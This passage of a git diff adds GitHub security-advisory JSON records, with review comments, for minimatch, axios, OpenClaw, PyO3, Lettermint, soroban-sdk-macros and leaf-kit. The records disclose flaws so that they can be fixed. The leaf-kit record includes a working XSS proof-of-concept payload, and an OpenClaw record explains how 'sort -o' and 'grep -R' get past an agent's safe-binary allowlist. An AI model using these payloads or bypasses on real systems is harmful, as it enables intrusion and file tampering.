and M characters, this is O(C(N+M, N)) — exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. 
This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "minimatch" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "10.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/isaacs/minimatch" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:38:11Z", + "nvd_published_at": "2026-02-20T03:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" 
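Review bot: The Details section of the new minimatch advisory still contains the GitHub security-advisory template placeholder `_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._`; that line should be replaced with real content (the `[^/]*?` compilation explanation currently filed under PoC is the natural candidate) or removed. Relatedly, `exponential.\n### Impact` lacks the blank line every other heading has, so the Impact heading may render inline with the preceding paragraph in some Markdown renderers.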
@@ -36,6 +36,28 @@
 "database_specific": {
 "last_known_affected_version_range": "<= 1.13.4"
 }
+ },
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "axios"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.30.3"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.30.2"
+ }
 }
 ],
 "references": [
@@ -51,14 +73,26 @@
 "type": "WEB",
 "url": "https://github.com/axios/axios/pull/7369"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/axios/axios/pull/7388"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/axios/axios"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/axios/axios/releases/tag/v0.30.0"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/axios/axios/releases/tag/v1.13.5"
diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json
new file mode 100644
index 0000000000000..3bd8b7d8813d7
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json
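Review bot: The release reference added in the `@@ -51,14 +73,26 @@` hunk points at `https://github.com/axios/axios/releases/tag/v0.30.0`, but the new 0.x affected range in the `@@ -36,6 +36,28 @@` hunk fixes at `0.30.3` with `last_known_affected_version_range` of `<= 0.30.2`; consumers expect the tag of the fixed release next to the existing `v1.13.5` tag, so either this URL is a typo for `v0.30.3` or the reason v0.30.0 is relevant should be stated. Narrowing the 1.x range to `introduced: "1.0.0"` in the earlier `@@ -25,7 +25,7 @@` hunk and adding a separate 0.x range with `introduced: "0"` is consistent, but the `details` string is untouched in this diff, so if it states affected versions in prose it should now mention the 0.x line as well.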
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-23T22:28:27Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [ + "CVE-2026-27487" + ], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27487" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + "url": 
"https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": "2026-02-21T10:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json new file mode 100644 index 0000000000000..2a8327c2369ec --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json 
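Review bot: The Fix section in the details still reads `Patched version: >= 2026.2.14 (next release)`, yet the references already include `releases/tag/v2026.2.14` and the affected range fixes at `2026.2.14`; the "(next release)" parenthetical is stale and should be dropped so readers do not assume the fix is unpublished. The summary `OpenClaw: Prevent shell injection in macOS keychain credential write` is phrased as the fix's commit title rather than as a description of the flaw, unlike the other summaries in this diff (for example `minimatch has a ReDoS …`); something like `OpenClaw vulnerable to shell injection via macOS keychain credential write` would match the database's style.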
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4685-c5cp-vp95",
+ "modified": "2026-02-19T22:06:00Z",
+ "published": "2026-02-19T22:06:00Z",
+ "aliases": [],
+ "summary": "OpenClaw safeBins stdin-only bypass via sort output and recursive grep flags",
+ "details": "## Summary\n`tools.exec.safeBins` could be bypassed for filesystem access when `sort` output flags (`-o` / `--output`) or recursive `grep` flags were allowed through safe-bin execution paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.17`\n- Patched versions: `>= 2026.2.19`\n- Latest published version at triage time: `2026.2.17`\n\n## Impact\nIn deployments that enabled `tools.exec.safeBins`, an attacker with access to command execution flows could turn intended stdin-only safe-bin usage into file writes (`sort -o`) or recursive file reads (`grep -R`).\n\n## Fix Commit(s)\n- `cfe8457a0f4aae5324daec261d3b0aad1461a4bc`\n\nThanks @nedlir for reporting.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2026.2.19"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2026.2.17"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4685-c5cp-vp95"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/cfe8457a0f4aae5324daec261d3b0aad1461a4bc"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-184",
+ "CWE-78"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T22:06:00Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
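Review bot: The affected range fixes at `2026.2.19` while the details state `Affected versions: <= 2026.2.17` and `last_known_affected_version_range` is `<= 2026.2.17`, so a `2026.2.18`, if one was published, is affected per the range but unmentioned in the prose; since the details record `2026.2.17` as the latest at triage time, either confirm no 2026.2.18 exists or change the prose to `< 2026.2.19`. The CVSS vector's AV:L and the LOW rating sit beside CWE-78 and a described file-write primitive (`sort -o`), and the Impact section does not explain why the attack is considered local-only; one sentence on who can reach the "command execution flows" would help consumers calibrate.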
diff --git a/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json
new file mode 100644
index 0000000000000..c657392d110ca
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json
@@ -0,0 +1,67 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-47qc-857f-7w7f",
+ "modified": "2026-02-19T20:25:46Z",
+ "published": "2026-02-19T20:25:46Z",
+ "aliases": [],
+ "summary": "PyO3 has type confusion when accessing data from sublasses of subclasses of native types with `abi3` feature",
+ "details": "PyO3 0.28.1 added support for `#[pyclass(extends=PyList)] struct NativeSub` (and other native types) when targeting Python 3.12 and up with the `abi3` feature.\n\nIt was discovered that subclasses of such classes would use the type of the subclass when attempting to access to data of `NativeSub` contained within Python objects, amounting to memory corruption.\n\nPyO3 0.28.2 fixed the issue by using the type of (e.g.) `NativeSub` correctly.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pyo3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.28.0"
+ },
+ {
+ "fixed": "0.28.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/PyO3/pyo3/pull/5807#issuecomment-3913251784"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/PyO3/pyo3/commit/75abd8602896b350fd8c778e52e0a74b4644ccca"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/PyO3/pyo3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/PyO3/pyo3/releases/tag/v0.28.2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rustsec.org/advisories/RUSTSEC-2026-0013.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-843"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-19T20:25:46Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
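Review bot: The summary has a typo, `sublasses` for `subclasses`, and the details' `attempting to access to data of` should read `attempting to access data of`. The affected range starts at `introduced: "0.28.0"`, but the details say the `extends=PyList` abi3 support that carries the bug was added in PyO3 0.28.1; if 0.28.0 lacks that code path, the range over-reports by one release and `introduced` should be `0.28.1`. With `RUSTSEC-2026-0013` present only under `references`, consider adding it to `aliases` if this database's convention is to alias RUSTSEC ids for crates.io advisories.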
diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json
new file mode 100644
index 0000000000000..3e50474af8813
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49pc-8936-wvfp", + "modified": "2026-02-23T22:30:18Z", + "published": "2026-02-20T21:14:49Z", + "aliases": [ + "CVE-2026-27492" + ], + "summary": "Lettermint Node.js SDK leaks email properties to unintended recipients when client instance is reused", + "details": "### Impact\nEmail properties (such as to, subject, html, text, and attachments) are not reset between sends when a single client instance is reused across multiple .send() calls. This can cause properties from a previous send to leak into a subsequent one, potentially delivering content or recipient addresses to unintended parties. Applications sending emails to different recipients in sequence — such as transactional flows like password resets or notifications — are affected.\n\n### Patches\nYes, the issue has been patched. Users should upgrade to v1.5.1 or later.\n\n### Workarounds\nIf upgrading immediately is not possible, instantiate a new client for each send:\n```js\nconst client = new Lettermint({ apiKey: process.env.LETTERMINT_API_KEY });\nawait client.email.to('...').subject('...').html('...').send();\n```\n\nThis ensures no state is carried over between sends.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "lettermint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27492" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lettermint/lettermint-node" + }, + { + 
"type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/blob/main/CHANGELOG.md#151-2026-02-20" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-488" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:14:49Z", + "nvd_published_at": "2026-02-21T11:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json new file mode 100644 index 0000000000000..b1103d27602d6 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json 
@@ -0,0 +1,124 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4chv-4c6w-w254", + "modified": "2026-02-19T21:56:47Z", + "published": "2026-02-17T21:29:05Z", + "aliases": [ + "CVE-2026-26267" + ], + "summary": "The rs-soroban-sdk #[contractimpl] macro calls inherent function instead of trait function when names collide", + "details": "### Impact\n\nThe `#[contractimpl]` macro contains a bug in how it wires up function calls.\n\nIn Rust, you can define functions on a type in two ways:\n- Directly on the type as an inherent function:\n ```rust\n impl MyContract {\n fn value() { ... }\n }\n ```\n- Through a trait\n ```rust\n impl Trait for MyContract {\n fn value() { ... }\n }\n ```\n\nThese are two separate functions that happen to share the same name. Rust has rules for which one gets called. When you write `MyContract::value()`, Rust always picks the one defined directly on the type, not the trait version.\n\nThe bug is that `#[contractimpl]` generates code that uses `MyContract::value()` style calls even when it's processing the trait version. This means if an inherent function is also defined with the same name, the inherent function gets called instead of the trait function.\n\nThis means the Wasm-exported entry point silently calls the wrong function when two conditions are met simultaneously:\n1. A `impl Trait for MyContract` block is defined with one or more functions, with `#[contractimpl]` applied.\n2. A `impl MyContract` block is defined with one or more identically named functions, without `#[contractimpl]` applied.\n\nIf the trait version contains important security checks, such as verifying the caller is authorized, that the inherent version does not, those checks are bypassed. 
Anyone interacting with the contract through its public interface will call the wrong function.\n\nFor example:\n\n```rust\n#[contract]\npub struct Contract;\n\nimpl Contract {\n /// Inherent function — returns 1.\n /// Bug: The macro-generated WASM export is wired up to call this function.\n pub fn value() -> u32 {\n 1\n }\n}\n\npub trait Trait {\n fn value(env: Env) -> u32;\n}\n\n#[contractimpl]\nimpl Trait for MyContract {\n /// Trait implementation — returns 2.\n /// Fix: The macro-generated WASM export should call this function.\n fn value() -> u32 {\n 2\n }\n}\n```\n\n### Patches\n\nThe problem is patched in `soroban-sdk-macros` version **25.1.1**. The fix changes the generated call from `::func()` to `::func()` when processing trait implementations, ensuring Rust resolves to the trait associated function regardless of whether an inherent function with the same name exists.\n\nUsers should upgrade to `soroban-sdk-macros` **>= 25.1.1** and recompile their contracts.\n\n### Workarounds\n\nIf upgrading is not immediately possible, contract developers can avoid the issue by ensuring that no inherent associated function on the contract type shares a name with any function in the trait implementation. 
Renaming or removing the conflicting inherent function eliminates the ambiguity and causes the macro-generated code to correctly resolve to the trait function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "25.0.0" + }, + { + "fixed": "25.1.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 25.1.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "23.0.0" + }, + { + "fixed": "23.5.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 23.5.1" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "22.0.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 22.0.9" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/security/advisories/GHSA-4chv-4c6w-w254" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26267" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1729" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1730" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1731" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/commit/e92a3933e5f92dc09da3c740cf6a360d55709a2b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stellar/rs-soroban-sdk" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-670" + ], + "severity": "HIGH", + "github_reviewed": true, + 
"github_reviewed_at": "2026-02-17T21:29:05Z", + "nvd_published_at": "2026-02-19T20:25:43Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json new file mode 100644 index 0000000000000..a079fd9c57ac1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json 
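Review bot: The Patches paragraph reads `The fix changes the generated call from `::func()` to `::func()``, which is a no-op as written; the two forms were presumably type-qualified (an inherent `MyContract::func()` versus a fully qualified `<MyContract as Trait>::func()`) and the angle-bracketed parts were stripped on import, so the sentence should be restored to say what the generated call actually changes to. The example in Impact declares `pub struct Contract;` but then writes `impl Trait for MyContract`, and the trait signature `fn value(env: Env) -> u32` does not match the impl's `fn value() -> u32`, so the snippet would not compile as shown; aligning the names and signatures would make the illustration usable. Both issues are inside the `details` string of the new advisory.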
@@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hfh-fch3-5q7p", + "modified": "2026-02-23T22:21:47Z", + "published": "2026-02-19T19:40:08Z", + "aliases": [ + "CVE-2026-27120" + ], + "summary": "Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster", + "details": "### Summary\n\n`htmlEscaped` in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.\n\n### Details\n\nRelevant code:\nhttps://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14\n\nStrings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters. \n\nFor example if you have the sequence \"́ (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.\n\nThus `\"\\\"́\".replacingOccurrences(of: \"\\\"\", with: \""\")` does not replace the quote mark. This allows you to break out of html attributes.\n\nI believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.\n\nI see depending on version, leafkit might use `replacing` instead of `replacingOccurences`. I don't know swift that well and couldn't find docs on what replacing does, so I don't know if both versions of the function are affected. 
The version of swift i was testing on I believe was using replacingOccurences\n\nIt seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of <. Thus i think this is mostly limited to attributes and not general text.\n\n### PoC\n\nAn example vapor application that is vulnerable might look like\n\nroutes.swift\n```swift\nimport Vapor\n\nstruct Hello: Content {\n var msg: String?\n}\n\nfunc routes(_ app: Application) throws {\n app.post { req throws in\n\tlet Hello = try req.content.decode(Hello.self)\n return req.view.render(\"hello\", [\n \"msg\": Hello.msg ?? \"Hello World!\"\n ])\n }\n}\n```\n\nWith a hello.leaf that looks like\n```\n
Hover to see message
\n```\n\nAnd then you POST something like `msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20`\n\n### Impact\nIf a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "SwiftURL", + "name": "leaf-kit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120" + }, + { + "type": "WEB", + "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vapor/leaf-kit" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-75", + "CWE-79", + "CWE-87" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:40:08Z", + "nvd_published_at": "2026-02-20T22:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json new file mode 100644 index 0000000000000..0b9184be45e10 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json 
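Review bot: The details leave open whether the `replacing` code path in newer leaf-kit/Swift is also affected ("I don't know if both versions of the function are affected"), yet the affected range asserts every version before 1.4.1 is vulnerable; the advisory should state the maintainers' finding so consumers of the range are not relying on the reporter's uncertainty. The root cause generalizes beyond leaf-kit: any escaper built on `Character`-level `replacingOccurrences`/`replacing` in Swift compares extended grapheme clusters, so a special character followed by a combining mark (U+0022 + U+0301) is never matched, and a correct fix has to operate on unicode scalars or UTF-8 code units (the comparison option the reporter mentions, or iterating `unicodeScalars`) — a sentence saying which approach commit 8919e39 took would let downstream projects audit their own escapers for the same pattern. As rendered here the replacement literal reads `\""\"`, an unescaped quote inside a JSON string; this is probably an `&quot;` entity-decoding artifact of this view rather than the stored file, but it is worth confirming since it would make the advisory unparseable.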
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hg8-92x6-h2f3", + "modified": "2026-02-20T16:44:19Z", + "published": "2026-02-17T21:40:46Z", + "aliases": [ + "CVE-2026-26319" + ], + "summary": "OpenClaw is Missing Webhook Authentication in Telnyx Provider Allows Unauthenticated Requests", + "details": "## Summary\n\nIn affected versions, OpenClaw's optional `@openclaw/voice-call` plugin Telnyx webhook handler could accept unsigned inbound webhook requests when `telnyx.publicKey` was not configured, allowing unauthenticated callers to forge Telnyx events.\n\nThis only impacts deployments where the Voice Call plugin is installed, enabled, and the webhook endpoint is reachable from the attacker (for example, publicly exposed via a tunnel/proxy).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.13`\n- Fixed: `>= 2026.2.14` (planned)\n\n## Details\n\nTelnyx webhooks are expected to be authenticated via Ed25519 signature verification.\n\nIn affected versions, `TelnyxProvider.verifyWebhook()` could effectively fail open when no Telnyx public key was configured, allowing arbitrary HTTP POST requests to the voice-call webhook endpoint to be treated as legitimate Telnyx events.\n\n## Fix\n\nThe fix makes Telnyx webhook verification fail closed by default and requires `telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to be configured.\n\nA signature verification bypass exists only for local development via `skipSignatureVerification: true`, which is off by default, emits a loud startup warning, and should not be used in production.\n\nThis requirement is documented in the Voice Call plugin docs.\n\n## Fix Commit(s)\n\n- `29b587e73cbdc941caec573facd16e87d52f007b`\n- `f47584fec` (centralized verification helper + stronger tests)\n\n## Workarounds\n\n- Configure `plugins.entries.voice-call.config.telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to enable signature verification.\n- Only for local development: set 
`skipSignatureVerification: true`.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f47584fec86d6d73f2d483043a2ad0e7e3c50411" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:46Z", + "nvd_published_at": "2026-02-19T23:16:24Z" + } +} \ No newline at end of file diff --git 